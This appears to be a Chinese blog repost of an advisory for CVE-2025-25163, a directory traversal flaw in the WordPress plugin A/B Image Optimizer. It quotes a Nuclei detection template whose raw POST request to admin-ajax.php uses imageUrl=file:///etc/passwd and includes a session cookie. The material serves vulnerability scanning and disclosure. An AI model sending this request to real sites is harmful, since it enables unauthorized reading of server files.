Plugin A/B Image Optimizer Directory Traversal Vulnerability

漏洞信息

漏洞名称: Plugin A/B Image Optimizer Directory Traversal Vulnerability

漏洞编号:

  • CVE: CVE-2025-25163

漏洞类型: 目录遍历

漏洞等级: 高危

漏洞描述: ### 受影响产品
Plugin A/B Image Optimizer 是一个WordPress插件,用于优化网站上的A/B测试图像。它广泛应用于使用WordPress构建的网站中,特别是在需要进行图像优化和A/B测试的场景。由于其广泛的使用,该插件的漏洞可能会影响到大量的网站。

漏洞说明

该漏洞属于目录遍历类型,存在于Plugin A/B Image Optimizer插件的所有版本中,包括3.3及之前的版本。漏洞的技术根源在于插件在处理用户提供的imageUrl参数时,未能正确验证和限制输入,导致攻击者可以通过构造恶意的imageUrl参数,如file:///etc/passwd,来读取服务器上的任意文件。这要求攻击者至少具有订阅者级别的访问权限。

影响分析

此漏洞允许认证的攻击者(至少具有订阅者权限)读取服务器上的敏感文件,如配置文件、密码文件等,可能导致敏感信息泄露。由于攻击需要认证,因此漏洞的利用门槛相对较高,但一旦利用成功,可能会对网站的安全性造成严重影响。此外,由于WordPress的广泛使用,该漏洞的影响范围可能非常广泛。

产品名称: Plugin A/B Image Optimizer

影响版本: version <= 3.3

来源: https://github.com/projectdiscovery/nuclei-templates/issues/12711

类型: projectdiscovery/nuclei-templates:github issues

来源概述

Is there an existing template for this?

  • I have searched the existing templates.

Nuclei Template

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
id: CVE-2025-25163

info:
name: Plugin A/B Image Optimizer Arbitrary File Download
author: 0xr2r
severity: high
description: |
The Plugin A/B Image Optimizer plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.
tags: wordpress, plugin, file-download, directory-traversal
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-25163
- https://www.cvedetails.com/cve/CVE-2025-25163/

http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:135.0) Gecko/20100101 Firefox/135.0
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in=superadmin%7C1740046038%7C1N8xr9D0vHFOPOWEa8SZgQgnMrADwNBlBuy2clxo5pS%7C1e77f848b7d3c4d32746de6c747e981273be0adb56efe08902946257e29284fe
Content-Length: 56

action=ab_save_image_locally&imageUrl=file:///etc/passwd
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "wp-content/uploads"
- type: regex
regex:
- "\\\\/wp-content\\\\/uploads\\\\/.*\\\\.gif"

Relevant dumped responses

1

Anything else?

No response


Plugin A/B Image Optimizer Directory Traversal Vulnerability
http://example.com/2025/07/25/github_1212465017/
作者
lianccc
发布于
2025年7月25日
许可协议